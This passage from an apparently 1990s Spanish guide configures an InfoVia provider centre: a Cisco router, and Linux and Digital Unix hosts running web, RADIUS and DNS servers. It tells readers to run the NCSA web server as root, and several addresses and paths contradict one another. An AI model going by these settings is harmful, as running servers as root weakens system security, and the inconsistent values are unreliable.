86400 ; Minimo TTL 1 dia
)
IN PTR maquina.cpi.telefonica.es.
1.0.0.127.IN-ADDR.ARPA. IN PTR localhost.

El registro de este fichero tienen el mismo significado que los de los dos
apartados anteriores (apartado 4.1.4.3 y apartado 4.1.4.4) y permite resolver
la direccion de bucle.


4.2 CONFIGURACION DEL ``ROUTER''
----------------------------

En este apartado se adjunta el fichero de configuracion del ``router'' del
ejemplo:

version 10.2
!
hostname router
!
enable password YYYYYYYY
!
ip subnet-zero
!
interface Ethernet0
ip address 10.128.102.1 255.255.255.0 secondary
ip address 194.179.42.1 255.255.255.192
!
interface Serial0
no ip address
encapsulation frame-relay IETF
frame-relay lmi-type ccitt
!
interface Serial0.1 point-to-point
ip address 194.179.6.135 255.255.255.128
frame-relay interface-dlci 17
!
interface Serial0.2 point-to-point
ip unnumbered Ethernet0
frame-relay interface-dlci 18
!
interface Serial0.3 point-to-point
ip unnumbered Ethernet0
frame-relay interface-dlci 19
!
interface Serial1
ip unnumbered Ethernet0
shutdown
!
ip default-network A.B.C.D
ip route 10.2.0.0 255.254.0.0 Serial0.2
ip route 194.179.42.128 255.255.255.224 Serial0.2
ip route 172.16.192.1 255.255.255.255 Serial0.2
ip route 10.4.0.0 255.254.0.0 Serial0.3
ip route 194.179.42.160 255.255.255.224 Serial0.3
ip route 172.16.193.1 255.255.255.255 Serial0.3
ip route A.B.C.D M A .M B .M C .M D G A .G B .G C .G D
!
line con 0
line aux 0
line vty 0 4
password XXXXXXXX
login
!
end

En el fichero anterior:

. XXXXXXXX representa la clave necesaria para conectarse al ``router''.

. YYYYYYYY representa la clave necesaria para poder configurar el ``router''.

. A.B.C.D representa la direccion IP correspondiente a la red por defecto.
Se trata de direcciones proporcionadas por Internet. Todos los paquetes cuya
direccion no este recogida en las tablas de rutas, se enviara a esta red por
defecto a traves del ``gateway'' indicado.

. M A .M B .M C .M D representa la mascara a aplicar a la red por defecto.
Esta mascara la proporcionara Internet.

. G A .G B .G C .G D representa el ``gateway'' a traves del cual se encamina
el trafico hacia la red por defecto. Esta direccion la proporcionara Internet.
En el acceso a Internet a traves de InfoVia el rango o ``pool'' de direcciones
de Internet lo concede el CPI, en concreto el servidor RADIUS del CPI. En el
ejemplo se han supuesto dos ``pools'' de 30 direcciones cada uno. Uno de estos
``pools'' es para asignar direcciones IP a los usuarios llamantes al CSIV de
Madrid, y el otro ``pool'' es para asignar direcciones IP a los usuarios
llamantes al CSIV de Barcelona. El ``pool'' correspondiente al CSIV de Madrid
va de la direccion 194.179.42.129 a la 194.179.42.158. El ``pool''
correspondiente al CSIV de Barcelona va de la direccion 194.179.42.161 a la
194.179.42.190. En ambos casos se trata de rangos contenidos en una subred de
32 maquinas, por lo que la mascara a emplear es 255.255.255.224. Para que
llegue la informacion a los usuarios llamantes con direcciones IP dentro de
ese rango, es preciso habilitar dos rutas en el ``router'' con los dos CSIV de
InfoVia (Madrid y Barcelona) a los que esta conectado. Estas rutas estan
recogidas en el fichero de configuracion anterior:

ip route 194.179.42.128 255.255.255.224 Serial0.2
ip route 194.179.42.160 255.255.255.224 Serial0.3

El ``router'' del CPI ha de saber por donde encaminar el trafico con destino
a los usuarios de InfoVia. Para ello se han de definir rutas con los CSIV de
InfoVia con los que esta conectado el CPI.

ip route 10.2.0.0 255.254.0.0 Serial0.2
ip route 10.4.0.0 255.254.0.0 Serial0.3

Por ultimo se han de definir dos rutas que permitan al servidor de RADIUS del
CPI enviar la informacion a los clientes RADIUS de los CSIV de Madrid y
Barcelona. Estas rutas se configuran en el ``router'' del CPI por medio de los
siguientes comandos:

ip route 172.16.192.1 255.255.255.255 Serial0.2
ip route 172.16.193.1 255.255.255.255 Serial0.3


4.3 CONCLUSIONES
------------

En este capitulo se ha presentado un ejemplo de un CPI, en el que se han
incluido los ficheros de configuracion de los equipos del centro. Para el
ejemplo se ha elegido el tipo mas complejo de CPI: el que permite el acceso a
Internet a traves de InfoVia. Se ha considerado ademas un caso en el que el
CPI se conecta con dos CSIV de InfoVia.
La configuracion de los restantes tipos de CPI contemplados en este documento,
es mas sencilla, ya que se reduce a un caso particular del ejemplo presentado
en este capitulo.


5 EJEMPLO DE CONFIGURACION DE UN CPI SOBRE PC CON SISTEMA OPERATIVO LINUX
=======================================================================


Con este tercer ejemplo de configuracion de un CPI se pretende
explicar como
instalar un CPI, del mismo tipo que el presentado en el Capitulo 4,
pero con
equipos de otro fabricante. Es decir, con este tercer ejemplo se
demuestra que
la instalacion de un CPI se puede hacer con equipos de diversos
fabricantes.
Las caracteristicas de este CPI son las que se enumeran en la
siguiente lista:

. Tipo del CPI: es un CPI con acceso a Internet desde InfoVia. El CPI
esta a
conectado a dos CSIV de InfoVia: el CSIV de Madrid y el CSIV de
Barcelona.

. Servicios ofrecidos por el CPI:

* Servidor de web para InfoVia.
* Servidor de web para Internet.
* Servicio de pasarela a Internet.

. Direcciones IP del CPI:

* Direcciones en InfoVia: El centro tiene asignado un rango de
256
direcciones en InfoVia. Este rango se emplea para dar
direcciones de
InfoVia a las maquinas del centro. Direcciones: Para las
maquinas del
centro: 10.128.102.0 a 10.128.102.255.
* Direcciones en Internet (asignadas por el IANA al
proveedor):
El centro tiene asignada una clase C de direcciones en
Internet:
Direcciones: 194.179.42.0 a 194.179.42.255

. El servidor de RADIUS del CSIV es el que se encarga de asignar
direcciones
de InfoVia a los usuarios llamantes a cada uno de los CPIs conectados
a ese
CSIV. Son por tanto los CSIV de Madrid y Barcelona los que controlaran
los
``pools'' de direcciones de InfoVia.

. Para los usuarios que accedan a Internet desde InfoVia, el CPI tiene
definido un ``pool'' de direcciones que puede asignar dinamicamente a
los
usuarios llamantes. Este ``pool'' a su vez se divide en dos rangos,
uno
para los usuarios llamantes al CSIV de Madrid y otro para los usuarios
llamantes al CSIV de Barcelona. Este ``pool'' comprende las siguientes
direcciones:

* ``Pool'' de direcciones para los usuarios llamantes al CSIV
de
Madrid. De 194.179.42.129 a 194.179.42.158, es decir un rango
de 30
direcciones.
* ``Pool'' de direcciones para los usuarios llamantes al CSIV
de
Barcelona. De 194.179.42.161 a 194.179.42.190, es decir un
rango de
30 direcciones.

Cuando cualquiera de los dos CSIV (Madrid o Barcelona) detecta que un
usuario
quiere acceder a Internet a traves de este CPI, el cliente de RADIUS
del
CSIV correspondiente consultara al servidor RADIUS del CPI elegido por
el
usuario llamante.

El equipamiento del CPI es el siguiente:

. Una maquina PC Compatible, con procesador 386 o superior, equipada
con dos
tarjetas de interfaz ethernet. El sistema operativo instalado es el
Linux
1.2.13 o superior.

. Un ``router'' CISCO 2500, equipado con una interfaz ethernet y dos
interfaces serie. Solo se van a emplear la interfaz ethernet y una de
las
interfaces serie.

. Un enlace ``frame-relay'' a 64 Kbit/s con tres PVCs, el 17 (para
Internet),
el 18 (para el CSIV de Madrid), y el 19 (para el CSIV de Barcelona).
Cada PVC
garantiza una velocidad minima de 16 Kbit/s.

. La RAL del CPI es Ethernet 10 Base 2.


5.1 CONFIGURACION DE LA MAQUINA LINUX
---------------------------------

En la maquina Linux del CPI se han instalado los siguientes
servidores:

. Un servidor de web NCSA. Se configura de modo que se comporte como
dos
servidores de web independientes, uno atendiendo a los accesos que
llegan por
la interfaz eth0 (Internet) y el otro atendiendo los accesos que
llegan por la
interfaz eth1 (InfoVia).

. Un servidor de RADIUS cuya mision es la de asignar dinamicamente las
direc-
ciones del ``pool'' de direcciones de Internet manejado por el CPI.

. Un servidor DNS.

En los siguientes puntos se detalla la configuracion de la maquina asi
como de
los diferentes servidores instalados en ella.


5.1.1 Instalacion de las dos tarjetas Ethernet
----------------------------------------

Para la instalacion de dos o mas tarjetas ethernet en una maquina
Linux
pueden seguirse las instrucciones dadas en la mini-HowTo
``Multiple-Ethernet''
que se encuentra en:

/usr/doc/faq/howto/mini/Multiple-Ethernet.gz

En concreto, en el fichero /etc/lilo.conf, debe incluirse una linea
que ponga
lo siguiente:

append=''ether=0,0,eth0 ether=0,0,eth1''

Una vez hecho esto, debe ejecutarse lilo.


5.1.2

  
Configuracion de direcciones, interfaces y rutas.
-------------------------------------------------

La maquina dispone de dos interfaces, la eth0 y la eth1, a las que se
le
asignan las siguientes direcciones IP:

. Direccion IP de la tarjeta eth0 (Internet): 194.179.42.2
. Direccion IP de la tarjeta eth1 (InfoVia): 10.128.102.2

El que la maquina Linux necesite dos tarjetas de interfaz de RAL se
debe a
que el ``Kernel'' no admite multiples direcciones IP para una unica
interfaz.
En el ejemplo se ha supuesto que el proveedor divide la clase C (256
direcciones) que se le ha concedido en subredes de 64 maquinas cada
una.
Por otra parte, en InfoVia, para los usuarios llamantes y los CPIs se
asignan
direcciones de la clase A 10.0.0.0 reservada por Internet para redes
privadas.
Esta clase A se subdivide en dos redes, la que va de 10.0.0.0 a
10.127.255.255
para los usuarios, mientras que las direcciones 10.128.0.0 a
10.255.255.255
para los CPIs. De acuerdo con esto, las mascaras correspondientes
seran:

. Mascara para la direccion IP de Internet: 255.255.255.192
. Mascara para la direccion IP de InfoVia: 255.128.0.0

En lo que a rutas se refiere, ha de habilitarse una ruta que permita
encaminar
el trafico de los usuarios de InfoVia y el trafico con el CSIV. En
esta ruta,
todo el trafico de las direcciones que van de la 10.0.0.0 a la
10.127.255.255,
ha de encaminarse a traves del ``router'' del CPI, el 10.128.102.1, y
ademas
permite que los paquetes salientes de la maquina tengan como direccion
origen
la de InfoVia.

Los ficheros necesarios para configurar las direcciones son:

. /etc/hosts
. /etc/rc.d/rc.inet1
A continuacion se indica la forma de configurar las interfaces.


5.1.2.1 Configuracion de la interfaz Internet (eth0)
--------------------------------------------

Para la configuracion de la primera interfaz se usara el ``script''
netconfig
que ofrece el sistema operativo.
Una vez invocado se contestara a las preguntas que va haciendo:

. Enter hostname: maquina-in
. Enter domain name for maquina-in: dom.es
. Do you plan to ONLY use loopback?: NO
. Enter IP address fo maquina-in (aaa.bbb.ccc.ddd): 194.179.42.2
. Enter gateway address (aaa.bbb.ccc.ddd): 194.179.42.1
. Enter netmask (aaa.bbb.ccc.ddd): 255.255.255.192
. Will you be accessing a nameserver?: NO (1)

Editar el fichero /etc/hosts y a¤adir la linea:

194.179.42.1 router-in


5.1.2.2 Configuracion de la Interfaz InfoVia (eth1)
-------------------------------------------

Editar el fichero /etc/hosts y a¤adir las siguientes lineas:

10.128.102.1 router-iv
10.128.102.2 maquina-iv

Editar el fichero /etc/rc.d/rc.inet1, y a¤adir las lineas:

# Configuracion de la interfaz eth1
/sbin/ifconfig eth1 10.128.102.2 broadcast 10.128.255.255 netmask
255.128.0.0

Para que el CPI pueda encaminar el trafico de los usuarios llamantes a
InfoVia
y que los paquetes con destino a esos usuarios tengan como direccion
origen la
de InfoVia, hay que incluir en el fichero la siguiente linea:

/sbin/route add -net 10.0.0.0 gw 10.128.102.1 metric 1 dev eth1

Para que el CPI pueda encaminar la informacion con destino al cliente
RADIUS
del CSIV de InfoVia al que se ha conectado, asi como al ``router'' del
CSIV
al que se conecta el CPI, debe incluirse en este fichero la linea:

/sbin/route add -host 172.16.192.1 gw 10.128.102.1 metric 1 dev eth1
/sbin/route add -host 172.16.193.1 gw 10.128.102.1 metric 1 dev eth1

Mover la linea /sbin/route add default gw ${GATEWAY} metric 1 al final
del
fichero 1 .

1. En caso de querer configurar un servidor de nombres del dominio
dom.es
se contestara SI a la pregunta, y a la siguiente pregunta se
respondera con
la direccion IP del servidor. Tambien puede hacerse editando el
fichero
/etc/resolv.conf y a¤adiendo, por cada servidor, una linea que
contenga en
primer lugar la palabra nameserver seguida de la direecion IP del
servidor.


5.1.3 Configuracion del servidor de web
---------------------------------

Se instala como superusuario un unico servidor web NCSA (http_1.5a-
export_linux1.2.13.tar.Z) en la maquina Linux. El servidor queda
instalado en
el directorio: /usr/local/etc/httpd
Debajo de este directorio se crean los directorios htdocs, htdocs-iv,
logs-in
y logs-iv.
En el directorio /usr/local/etc/httpd/conf se renombran los siguientes
archivos:

access.conf-dist como access.conf
httpd.conf-dist como httpd.conf
localhost.srm-dist como localhost.conf
srm.conf-dist como srm.conf

Se edita el fichero /usr/local/etc/httpd/conf/httpd.conf y se cambian
las
siguientes lineas:

User nobody por User root
Group #-1 por Group root
ServerAdmin you@your.address por ServerAdmin
postmaster@maquina-in.dom.es
ErrorLog logs/error_log por ErrorLog logs-in/error_log
TransferLog logs/access_log por TransferLog logs-in/access_log
AgentLog logs/agent_log por AgentLog logs-in/agent_log
RefererLog logs/referer_log por RefererLog logs-in/refere_log
PidFile logs/httpd.pid por logs-in/httpd.pid
DocumentRoot /local por DocumentRoot /usr/local/etc/httpd

Al final del fichero se a¤aden las siguientes lineas para permitir el
acceso
a las paginas de web desde InfoVia:

<VirtualHost 10.128.102.2>
ServerName maquina-iv
ServerAdmin postmaster@maquina_inf
DocumentRoot /usr/local/etc/htdocs-iv
ErrorLog logs-iv/error_log
TransferLog logs-iv/access_log
AgentLog logs-iv/agent_log
RefererLog logs-iv/refere_log
</VirtualHost>


5.1.4 Configuracion del servidor de RADIUS
------------------------------------

El CPI elegido para el ejemplo permite el acceso a Internet a traves
de
InfoVia. Por lo tanto debera instalarse en la maquina Linux del CPI un
servidor de RADIUS que gestione el rango de direcciones de Internet y
las
vaya asignando a los usuarios llamantes. En el ejemplo propuesto, este
``pool'' de direcciones IP asignadas por el IANA al proveedor esta
dividido a
su vez en dos ``pools'', uno para el CSIV de Madrid y otro para el
CSIV de
Barcelona. El rango asignado al primer CSIV es el que va de la
direccion
194.179.42.129 a la 194.179.42.158. El rango asignado al segundo CSIV
va de
la direccion 194.179.42.161 a la 194.179.42.190.
En el ejemplo, el servidor RADIUS del CPI se ha instalado en el
directorio:

/home/prueba/radius_cpi_pr

Para obtener el fichero ejecutable del servidor, los ficheros fuente
del
servidor RADIUS deberan compilarse para una maquina Linux. El fichero
ejecutable se ha situado en el directorio /home/prueba/radius_cpi_pr.
Para el
arranque del servidor, desde el directorio /home/prueba/radius_cpi_pr
ha de
ejecutarse el comando:

nohup radiusd -d . &

Si se quieren trazas del servidor, en el directorio
/home/prueba/radius_cpi_pr
deberan ejecutarse los siguientes comandos:

touch Activar.radius1
touch Activar.radius2

El servidor estara activo si al ejecutar el comando:

ps -ax | grep radiusd

Se obtiene como respuesta:

12675 pp0 S N 0:00 radiusd -d .
12679 pp0 S 0:00 grep radiusd

Las opciones con las que se ejecuta el comando radius son:

* -d nombre_del_directorio_radius

Los ficheros de configuracion del servidor, almacenados en el
directorio
indicado, son los mismos que se indicaron en el apartado apartado
4.1.3 del
Capitulo 4.


5.1.5 Configuracion del servidor DNS
------------------------------

El servidor de nombres se arranca con el comando named del sistema
operativo.
Para el correcto funcionamiento del servidor DNS es necesario crear
los
ficheros de configuracion indicados en el apartado 4.1.4 de este
documento.
Para que el servidor de nombres arranque automaticamente tras un
rearranque
de la maquina, se editara el fichero /etc/rc.d/rc.inet2 y se borrara
el
caracter de comentario (#) de las siguientes lineas:

# Start the NAMED/BIND name server.
if [ -f ${NET}/named ]; then
echo -n `` named''
${NET}/named
fi


5.2 CONFIGURACION DEL ``ROUTER''
----------------------------

Al emplearse en este ejemplo el mismo ``router'' que en el ejemplo del
Capitulo 4, el fichero de configuracion es el mismo que el recogido en
el apartado 4.2 de este documento.


6 EJEMPLO DE CONFIGURACION DE UN CPI SOBRE UNA MAQUINA CON DIGITAL
UNIX

======================================================================

Con este ejemplo de configuracion de un CPI se explica como instalar
un CPI,
del mismo tipo que los presentados anteriormente, pero con un nuevo
equipamiento. Las caracteristicas de este CPI son las siguientes

. Tipo del CPI: es un CPI con acceso a Internet desde InfoVia. El CPI
esta a
conectado a dos CSIV de InfoVia: el CSIV de Madrid y el CSIV de
Barcelona.

. Servicios ofrecidos por el CPI:

* Servidor de web para InfoVia.
* Servidor de web para Internet.
* Servicio de pasarela a Internet.

. Direcciones IP del CPI:

* Direcciones en InfoVia: El centro tiene asignado un rango de
256
direcciones en InfoVia. Este rango se emplea para dar
direcciones
de InfoVia a las maquinas del centro. Direcciones: Para las
maquinas
del centro: 10.128.10.0 a 10.128.10.255.
* Direcciones en Internet (asignadas por el IANA al
proveedor):
El centro tiene asignada una clase C de direcciones en
Internet:
Direcciones: 192.168.2.0 a 192.168.2.255

. El servidor de RADIUS del CSIV es el que se encarga de asignar
direcciones
de InfoVia a los usuarios llamantes a cada uno de los CPIs conectados
a ese
CSIV. Son por tanto los CSIV de Madrid y Barcelona los que controlaran
los
``pools'' de direcciones de InfoVia.

. Para los usuarios que accedan a Internet desde InfoVia, el CPI tiene
definido un ``pool'' de direcciones que puede asignar dinamicamente a
los
usuarios llamantes. Este ``pool'' a su vez se divide en dos rangos,
uno para
los usuarios llamantes al CSIV de Madrid y otro para los usuarios
llamantes
al CSIV de Barcelona. Este ``pool'' comprende las siguientes
direcciones:

* ``Pool'' de direcciones para los usuarios llamantes al CSIV
de
Madrid. De 192.168.2.129 a 192.168.2.158, es decir un rango de
30
direcciones.
* ``Pool'' de direcciones para los usuarios llamantes al CSIV
de
Barcelona. De 192.168.2.161 a 192.168.2.190, es decir un rango
de 30
direcciones.

Cuando cualquiera de los dos CSIV (Madrid o Barcelona) detecta que un
usuario
quiere acceder a Internet a traves de este CPI, el cliente de RADIUS
del
CSIV correspondiente consultara al servidor RADIUS del CPI elegido por
el
usuario llamante.

El equipamiento del CPI es el siguiente:

. Una maquina Digital Alphaserver 1000,, equipada con dos tarjetas de
interfaz ethernet. El sistema operativo instalado es el Digital Unix
3.2C.

. Un ``router'' CISCO 2500, equipado con una interfaz ethernet y dos
interfaces serie. Solo se van a emplear la interfaz ethernet y una de
las
interfaces serie.

. Un enlace frame relay a 64 Kbit/s con tres PVCs, el 17 (para
Internet),
el 18 (para el CSIV de Madrid), y el 19 (para el CSIV de Barcelona).
Cada PVC garantiza una velocidad minima de 16 Kbit/s.

. La RAL del CPI es Ethernet 10 Base 2.

En los proximos apartados se detalla la configuracion de cada una de
las maquinas que
integran el CPI del ejemplo.


6.1 CONFIGURACION DE LA MAQUINA DIGITAL UNIX
----------------------------------------

En la maquina Digital UNIX del CPI se han instalado los siguientes
servidores:

. Un servidor de web Netscape Commerce Server. Se configura de modo
que se
comporte como dos servidores de web independientes, uno atendiendo a
los
accesos que llegan por la interfaz tu0 (Internet) y el otro atendiendo
los
accesos que llegan por la interfaz tu1 (InfoVia).

. Un servidor de RADIUS cuya mision es la de asignar dinamicamente las
direc-
ciones del ``pool'' de direcciones de Internet manejado por el CPI.
En los siguientes puntos se detalla la configuracion de la maquina asi
como
de los diferentes servidores instalados en ella.


6.1.1 Configuracion de direcciones, interfaces y rutas.
-------------------------------------------------

La maquina dispone de dos interfaces, la tu0 y la tu1, a las que se le
asignan
las siguientes direcciones IP:

. Direccion IP de la tarjeta tu0 (Internet): 192.168.2.7

. Direccion IP de la tarjeta tu1 (InfoVia): 10.128.10.7
El que la maquina Digital Alphaserver 1000 necesite dos tarjetas de
interfaz
RAL se debe a que las maquinas Digital UNIX no admiten doble direccion
IP.
Esta es la unica diferencia apreciable entre el ejemplo del Capitulo 4
y
el ejemplo descrito en este capitulo.
En el ejemplo se ha supuesto que el proveedor divide la clase C (256
direcciones) que se le ha concedido en subredes de 64 maquinas cada
una.
Por otra parte, en InfoVia, para los usuarios llamantes y los CPIs se
asignan
direcciones de la clase A 10.0.0.0 reservada por Internet para redes
privadas.
Esta clase A se subdivide en dos redes, la que va de 10.0.0.0 a
10.127.255.255
para los usuarios, mientras que las direcciones 10.128.0.0 a
10.255.255.255
para los CPIs. De acuerdo con esto, las mascaras correspondientes
seran:

. Mascara para la direccion IP de Internet: 255.255.255.192
. Mascara para la direccion IP de InfoVia: 255.128.0.0

En lo que a rutas se refiere, ha de habilitarse una ruta que permita
encaminar el trafico de los usuarios de InfoVia y el trafico con el
CSIV.
En esta ruta, todo el trafico de las direcciones que van de la
10.0.0.0 a la
10.127.255.255, ha de encaminarse a traves del ``router'' del CPI, el
10.128.10.1, y ademas permite que los paquetes salientes de la maquina
tengan
como direccion origen la de InfoVia.

Los ficheros necesarios para configurar las direcciones son:

. /etc/hosts
. /etc/rc.config

El contenido de estos ficheros se muestra en los siguientes
subapartados. La
configuracion de la red se realiza utilizando la herramienta netsetup
del menu
de configuracion del sistema.

6.1.1.1 Fichero /etc/hosts
------------------

En este fichero se asocian las direciones IP de las maquinas con sus
nombres.
Se editara este fichero y se a¤adiran las siguientes lineas:

#
127.0.0.1 localhost
192.168.2.7 alphaosf.digital.es alphaosf
192.168.2.1 router router-Internet
10.128.2.7 digital.inf alphaosf-infovia
10.128.2.1 router-infovia router-inf
10.1.1.2 Fichero /etc/rc.config

En este fichero se le indica a la maquina su nombre, asi como las
interfaces
configuradas y las distintas opciones de configuracion de la red
activadas
utilizando la herramienta netsetup.
En este fichero se pueden configurar y activar, o activar, interfaces,
asi
como definir el tipo de encaminamiento (``routing'') utilizado. El
fichero
debe contener las siguientes lineas indicando el numero de interfaces
definidas y la configuracion de estas.

#!/bin/sh
#HOSTNAME - host name of the system
#
#NUM_NETCONFIG - number of network devices currently configured
#
#MAX_NETDEVS - maximun number of network devices that can be
configured
# which is currently set by netsetup to a value of 16
#
#NETDEV_n - network device name for network devices currently
# configured, where n is 0 to MAX_NETDEVS- 1
# for example, NETDEV_0=''ln0''
#
#IFCONFIG_n - ifconfig parameters for network devices currently
# configured, where n is 0 to MAX_NETDEVS - 1
# (see ifconfig(8) manual page)
# for example, IFCONFIG_0=''130.124.1.20 netmask 255.255.255.0''
#
#RWHOD - ``yes'' if rwhod is enabled, blank or ``no'' if rwhold is
disabled
#
#ROUTED - ``yes'' if routed is enabled, blank or ``no'' if routed is
disabled
#
#ROUTED_FLAGS - routed flags (see routed(8) manual page)
#
#ROUTER - ``yes'' if the system is set up to be an Internet Protocol
router,
# otherwise, blank or ``no''
#
#GATED - ``yes'' if gated is enabled, blank or ``no'' if gated is
disabled
#
#GATED_FLAGS - gated flags (see gated(8) manual page)
#
DISPLAYTYPE=
HOSTNAME=''alphaosf''
NUM_NETCONFIG=''2''
MAX_NETDEVS=''24''
NETDEV_0=''tu0''
NETDEV_1=''tu1''
NETDEV_2=
NETDEV_3=
NETDEV_4=
NETDEV_5=
NETDEV_6=
NETDEV_7=
IFCONFIG_0=''192.168.2.7 netmask 255.255.255.192''
IFCONFIG_1=''10.128.10.7 netmask 255.128.0.0''
IFCONFIG_2=
IFCONFIG_3=
IFCONFIG_4=
IFCONFIG_5=
IFCONFIG_6=
IFCONFIG_7=
RWHOD=''no''
ROUTED=''yes''
ROUTED_FLAGS=''-q''
ROUTER=''no''
GATED=''no''
GATED_FLAGS=
PAGERAW=''1''
PAGEFILE=''/dev/rz1b''
PARTITION=''rz1b''
PARTITIONTYPE=''RZ2SL''
PAGEMINSZ=0
PAGEMAXSZ=0
QUOTA_CONFIG=
export DISPLAYTYPE HOSTNAME NUM_NETCONFIG QUOTA_CONFIG
export NETDEV_0 NETDEV_1 NETDEV_2 NETDEV_3 NETDEV_4 NETDEV_5
NETDEV_6 NETDEV_7
export IFCONFIG_0 IFCONFIG_1 IFCONFIG_2 IFCONFIG_3 IFCONFIG_4
IFCONFIG_5
export IFCONFIG_6 IFCONFIG_7 RWHOD ROUTED ROUTED_FLAGS GATED
GATED_FLAGS
export ROUTER MAX_NETDEVS
export PAGERAW PAGEFILE PARTITION PARTITIONTYPE PAGEMINSZ
PAGEMAXSZ
LAT_SETUP=''1''
export LAT_SETUP


6.1.1.3 Nombre de la maquina
--------------------

En este fichero se incluyen las rutas necesarias para encaminar
adecuadamente
el trafico del CPI. Para que el CPI pueda encaminar el trafico de los
usuarios
llamantes a InfoVia y que los paquetes con destino a esos usuarios
tengan como
direccion origen la de InfoVia, hay que definir la siguiente ruta:

-net 10.0.0.0 10.128.10.1

Para que el CPI pueda encaminar la informacion con destino al cliente
RADIUS
del CSIV de InfoVia al que se ha conectado, asi como al ``router'' del
CSIV
al que se conecta el CPI, debe incluirse en este fichero la ruta:

-net 172.16.0.0 10.128.10.1

Para configurar la ruta por defecto, en este fichero ha de incluirse
la
siguiente ruta:

default 192.168.2.1

Para incluir todas estas rutas, se debe utilizar la herramienta
netsetup del
menu de configuracion del sistema. El fichero resultante de a¤adir
estas rutas
es el siguiente:

-net 10.0.0.0 10.128.10.1
-net 172.16.0.0 10.128.10.1
default 192.168.2.1


6.1.2 Configuracion del servidor de web
---------------------------------

Se ha instalado un unico servidor web Netscape (se trata del Netscape
Commerce Server) en la maquina UNIX. El servidor queda instalado en el
directorio:

/usr/ns-home

Para facilitar la configuracion del servidor Netscape, existe un
segundo
servidor instalado en otro puerto que no es el estandar (el puerto
estandar
es el 80). Para saber cual es el puerto no estandar se ha de ejecutar
el
comando:

/usr/ns-home/start-admin

Una vez ejecutado este comando se sabe cual es el puerto al que hay
que
conectarse para configurar el servidor Netscape, tanto para el caso de
la
interfaz tu0 como el de la interfaz tu1.
Para la configuracion y arranque del servidor Netscape se ha dispuesto
de un
terminal X-Windows. En este terminal existia un cliente Netscape, por
medio
del cual, conectandose al puerto no estandar de la maquina, se
configuro el
servidor Netscape. Al configurarlo se ha hecho de forma tal que se
comporte
como dos servidores independientes, uno con la direccion IP
192.168.2.7
(la correspondiente a la interfaz tu0 del servidor) y otro con la
direccion IP
10.128.10.7 (la correspondiente a la interfaz tu1 del servidor). De
este modo,
la configuracion del servidor Netscape se ha podido hacer por medio de
paginas
web, lo que simplifica el trabajo y evita editar todos los ficheros de
configuracion que se adjuntan en este apartado.
El servidor web para Internet esta configurado para ``escuchar'' por
el puerto
443, el puerto estandar para transacciones seguras del protocolo SSL
(Secure Sockets Layer) del Netscape Commerce Server, mientras que el
servidor
web para InfoVia esta configurado para utilizar el puerto 80, estandar
para
paginas web.
En el fichero admpw se define la clave (``password'') necesaria para
la
configuracion remota, por medio de un cliente Netscape del servidor
Netscape.
En el ejemplo, este fichero esta en el directorio
/usr/ns-home/admserv/.
Una vez explicado como se puede configurar de forma remota el
servidor, se
puede pasar a ver en detalle los ficheros de configuracion del mismo.
El
fichero ejecutable del servidor Netscape es:

/usr/ns-home/bin/httpd/ns-httpd

Para que el unico servidor se comporte como si se tratase de dos
servidores
independientes, uno para cada una de .las direcciones IP asignadas a
la
maquina, se han creado los directorios:
Configuracion del servidor web para Internet (direccion IP
192.168.2.7):
El directorio de configuracion del servidor:

/usr/ns-home/httpd-443.192.168.2.7/config

El directorio en el que se almacenan los ficheros con las conexiones
(``logs'')
al servidor de Internet:

/usr/ns-home/httpd-443.192.168.2.7/logs

Los ficheros ejecutables:

/usr/ns-home/httpd-443.192.168.2.7/restart
/usr/ns-home/httpd-443.192.168.2.7/rotate
/usr/ns-home/httpd-443.192.168.2.7/start
/usr/ns-home/httpd-443.192.168.2.7/stop

Configuracion del servidor web para InfoVia (direccion IP 10.128.2.7):
El directorio de configuracion del servidor:

/usr/ns-home/httpd-80.10.128.2.7/config

El directorio en el que se almacenan los ficheros con las conexiones
(``logs'')
al servidor de InfoVia:

/usr/ns-home/httpd-80.10.168.10.7/logs

Los ficheros ejecutables:

/usr/ns-home/httpd-80.10.128.10.7/restart
/usr/ns-home/httpd-80.10.128.10.7/rotate
/usr/ns-home/httpd-80.10.128.10.7/start
/usr/ns-home/httpd-80.10.128.10.7/stop

Para configurar el servidor web Netscape, y que se comporte como dos
servidores
independientes, han de configurarse los siguientes ficheros:
Configuracion del servidor web para Internet (direccion IP
192.168.2.7):
El directorio de configuracion del servidor:

/usr/ns-home/httpd-443.192.168.2.7/config/magnus.conf
/usr/ns-home/httpd-443.192.168.2.7/config/obj.conf

Configuracion del servidor web para InfoVia (direccion IP 10.128.2.7):
El directorio de configuracion del servidor:

/usr/ns-home/httpd-80.10.128.10.7/config/magnus.conf
/usr/ns-home/httpd-80.10.128.10.7/config/obj.conf

Para el arranque del ``servidor'' de Internet, se ha de ejecutar el
comando.

/usr/ns-home/httpd-443.192.168.2.7/start

Para el arranque del ``servidor'' de InfoVia, se ha de ejecutar el
comando.

/usr/ns-home/httpd-80.10.128.10.7/start

La ruta de acceso (``path'') de los ficheros anteriores no tiene por
que ser esa,
ya que puede instalarse el servidor en otro sitio. Pero en el ejemplo
que aqui
se presentan, se ha instalado el servidor en el directorio
/usr/ns-home.


6.1.2.1 Fichero /usr/ns-home/httpd-443.192.168.2.7/config/magnus.conf
-------------------------------------------------------------

#ServerRoot /usr/ns-home/https-443.192.168.2.7
Port 443
Address 192.168.2.7
LoadObjects obf.conf
RootObject default
ErrorLog /usr/ns-home/https-443.192.168.2.7/logs/errors
PidLog /usr/usr/ns-home/https-443.192.168.2.7/logs/pid
User httpd
ServerName alphaosf.telefonica.es
Security off
MinProcs 16
MaxProcs 32
DNS on
Init fn=load-types mime-types= mime-types
Init fn=init-clf global=/usr/ns-home/https-443.192.168.2.7/logs/access

secure=/usr/ns-home/https-443.192.168.2.7/logs/secure


6.1.2.2 Fichero /usr/ns-home/httpd-443.192.168.2.7/config/obj.conf
----------------------------------------------------------

<Object name=default>
NameTrans fn=pfx2dir from=/mc-icons dir=''/usr/ns-home/mc-icons''
NameTrans fn=document-root root=''/usr/ns-home/docs/internet''
PathCheck fn=unix-uri-clean
PathCheck fn=find-pathinfo
PathCheck fn=find-index index-names=''index.html,home.html''
ObjectType fn=type-by-extension
ObjectType fn=force-type type=text/plain
Service method=(GET|HEAD) type=magnus-internal/imagemap
fn=imagemap
Service method=(GET|HEAD) type=magnus-internal/directory fn=index-
common
Service method=(GET|HEAD) type=*”magnus-internal/* fn=send-file
AddLog fn=common-log
AddLog fn=record-keysize name=secure
</Object>
<Object name=cgi>
ObjectType fn=force-type type=magnus-internal/cgi
Service fn=send-cgi
</Object>


